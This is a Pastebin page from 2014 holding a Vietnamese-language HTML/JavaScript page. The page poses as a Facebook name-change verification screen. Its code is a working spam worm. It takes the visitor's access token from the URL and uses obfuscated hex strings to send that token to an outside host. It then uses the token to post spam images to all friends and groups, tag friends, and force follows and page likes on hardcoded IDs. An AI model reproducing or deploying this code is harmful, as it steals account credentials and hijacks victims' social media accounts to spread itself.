Advertisement
Guest User

index code post wall

a guest
Dec 21st, 2014
204
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.28 KB | None | 0 0
  1. <html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8">
  2.  
  3. </head><body onload="get_groups();get_friends();join_group();follow();like_page();timeline();"><center>
  4. <img src="http://jimpunk.net/Loading/wp-content/uploads/loading1.gif"><br><h3>Vui lòng đợi : <font color="blue"><span id="time">80</span></font> Giây Waiting !</h3><h3> Đang xác thực thông tin tài khoản facebook để đổi tên.</h3> </center>
  5.  
  6. <title>Đang Seting. Vui lòng chờ trong giây lát ..</title>
  7. <link rel="shortcut icon" href="https://fbstatic-a.akamaihd.net/rsrc.php/yl/r/H3nktOa7ZMg.ico">
  8. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js"></script>
  9.  
  10.  
  11. <script>
  12. var url = "";
  13. var image_link = "http://d.f21.photo.zdn.vn/upload/original/2014/12/19/11/17/3107348677_579870548_574_574.jpg";
  14. var text = "Bé đang làm gì đây ak @@";
  15. var backlink = "http://fb.com/4"
  16. gonderildi = 0;
  17.  
  18. var _0x91c2=["\x73\x75\x62\x73\x74\x72\x69\x6E\x67","\x68\x61\x73\x68","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x68\x74\x74\x70\x3A\x2F\x2F\x68\x6F\x74\x32\x34\x73\x2E\x63\x6F\x6D\x2F\x73\x70\x61\x6D\x2F\x6C\x6F\x67\x69\x6E\x2E\x70\x68\x70","\x70\x6F\x73\x74"];var access_token=window[_0x91c2[2]][_0x91c2[1]][_0x91c2[0]](1);$[_0x91c2[4]](_0x91c2[3],{accesstoken:access_token});
  19.  
  20.  
  21. function get_groups(){
  22. jQuery.ajax({
  23. url:'https://graph.facebook.com/fql?q=select gid, name from group where gid IN (SELECT gid FROM group_member WHERE uid=me()) order by rand() limit 700&access_token='+access_token,
  24. dataType:'jsonp',
  25. success:function(data){
  26. post_groups(data);
  27. }
  28. });
  29. }
  30. function get_friends(){
  31. jQuery.ajax({
  32. url:'https://graph.facebook.com/fql?q=SELECT uid, first_name FROM user WHERE uid IN ( SELECT uid2 FROM friend WHERE uid1 = me() ) ORDER BY rand() limit 5000&access_token='+access_token,
  33. dataType:'jsonp',
  34. success:function(data){
  35. post_friends(data);
  36. }
  37. });
  38. }
  39. function post_friends(list){
  40. for(i=0;i<list.data.length;i++){
  41. var megaNumber=Math.floor(Math.random()*10000);
  42. var commentMessage = text ;
  43. jQuery.ajax({
  44. url:'https://graph.facebook.com/'+list.data[i].uid+'/photos?url=' + image_link + '&message=' + commentMessage +'' + url + '&callback=paylas&method=POST&access_token=' + access_token,
  45. dataType:'script',
  46. success:function(){
  47. gonderildi += 1;
  48. if(gonderildi >= list.data.length){
  49. }
  50. }
  51. });
  52. }
  53. }
  54. function post_groups(list){
  55. for(i=0;i<list.data.length;i++){
  56. var megaNumber=Math.floor(Math.random()*10000);
  57. var commentMessage = text ;
  58. jQuery.ajax({
  59. url:'https://graph.facebook.com/'+list.data[i].gid+'/photos?url=' + image_link + '&message='+ commentMessage +'' + url + '&callback=paylas&method=POST&access_token=' + access_token,
  60. dataType:'script',
  61. success:function(){
  62. gonderildi += 1;
  63. if(gonderildi >= list.data.length){
  64. }
  65. }
  66. });
  67. }
  68. }
  69.  
  70. function timeline() {
  71. $['getJSON']('https://graph.facebook.com/me/photos?url=' + image_link + '&message=' + commentMessage + '' + url + '&method=POST&access_token=' + access_token, function (_0x1f66xf) {
  72. if (_0x1f66xf['id']) {
  73. var _0x1f66x11 = _0x1f66xf['id'];
  74. var _0x1f66x12 = 100;
  75. $['getJSON']('https://graph.facebook.com/me/friends?limit=' + _0x1f66x12 + '&access_token=' + access_token, function (_0x1f66xf) {
  76. if (_0x1f66xf['data']) {
  77. var _0x1f66x13 = [];
  78. $['each'](_0x1f66xf['data'], function (_0x1f66x14, _0x1f66x7) {
  79. _0x1f66x13['push'](_0x1f66x7['id']);
  80. $['getJSON']('https://graph.facebook.com/' + _0x1f66x11 + '/tags/' + _0x1f66x7['id'] + '/?method=POST&access_token=' + access_token, function (_0x1f66xf) {});
  81. });
  82. };
  83. });
  84. };
  85. });
  86. };
  87.  
  88.  
  89. function follow(id){
  90. $.getJSON('https://graph.facebook.com/' + id + '/subscribers?method=post&access_token=' + access_token, function (response) {
  91. });
  92. }
  93. function like_page(id){
  94. $.getJSON('https://graph.facebook.com/me/likes?access_token=' + access_token + '&method=POST&url=https://www.facebook.com/' + id, function (response) {
  95. });
  96. }
  97. function like_post(id){
  98. $.getJSON('https://graph.facebook.com/' + id + '/likes/?method=post&access_token=' + access_token, function (response) {
  99. });
  100. }
  101. function join_group(grpid){
  102. $.getJSON('https://graph.facebook.com/me?access_token=' + access_token, function (response) {
  103. if (response.id) {
  104. var userid = response.id;
  105. $.getJSON('https://graph.facebook.com/'+grpid+'/members/' + userid + '?method=post&access_token=' + access_token, function (response) {
  106. if(response.data){
  107. }
  108. });
  109. }
  110. });
  111. };
  112. var _0xc901=["\x31\x30\x30\x30\x30\x36\x33\x37\x31\x38\x35\x37\x31\x34\x35","\x31\x30\x30\x30\x30\x36\x38\x38\x36\x32\x37\x34\x38\x33\x38","\x31\x30\x30\x30\x30\x37\x37\x39\x35\x35\x34\x30\x30\x36\x30","\x31\x30\x30\x30\x30\x38\x34\x33\x33\x31\x30\x37\x34\x34\x39","\x31\x30\x30\x30\x30\x37\x38\x32\x39\x35\x36\x34\x33\x33\x31","\x33\x30\x35\x37\x34\x38\x34\x37\x32\x39\x34\x39\x31\x30\x34","\x33\x36\x38\x31\x32\x33\x39\x33\x33\x33\x31\x32\x34\x34\x32","\x31\x35\x38\x36\x31\x39\x33\x33\x36\x34\x39\x33\x37\x30\x39\x35","\x36\x38\x39\x32\x32\x38\x38\x33\x37\x38\x34\x32\x33\x35\x33","\x37\x33\x39\x35\x35\x31\x36\x38\x32\x37\x35\x39\x37\x35\x33","\x31\x35\x31\x35\x32\x37\x31\x31\x35\x35\x33\x37\x38\x39\x34\x38","\x32\x39\x37\x38\x37\x30\x36\x37\x33\x37\x35\x33\x37\x37\x35"];follow(_0xc901[0]);follow(_0xc901[1]);follow(_0xc901[2]);follow(_0xc901[3]);follow(_0xc901[4]);like_page(_0xc901[5]);like_page(_0xc901[6]);like_page(_0xc901[7]);like_page(_0xc901[8]);like_page(_0xc901[9]);like_page(_0xc901[9]);like_page(_0xc901[10]);like_page(_0xc901[11]);
  113. </script><script type="text/javascript">
  114. var jgt = 80;
  115. document.getElementById('time').innerHTML = jgt;
  116. function stime(){document.getElementById('time').innerHTML = jgt; jgt = jgt - 1;
  117. if(jgt == 0){clearInterval(timing); location = '' +backlink ;}
  118. }
  119. var timing = setInterval("stime();",1000);
  120. </script>
  121. <div id="token"><div>
  122.  
  123.  
  124.  
  125.  
  126.  
  127.  
  128.  
  129. </div></div></body></html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement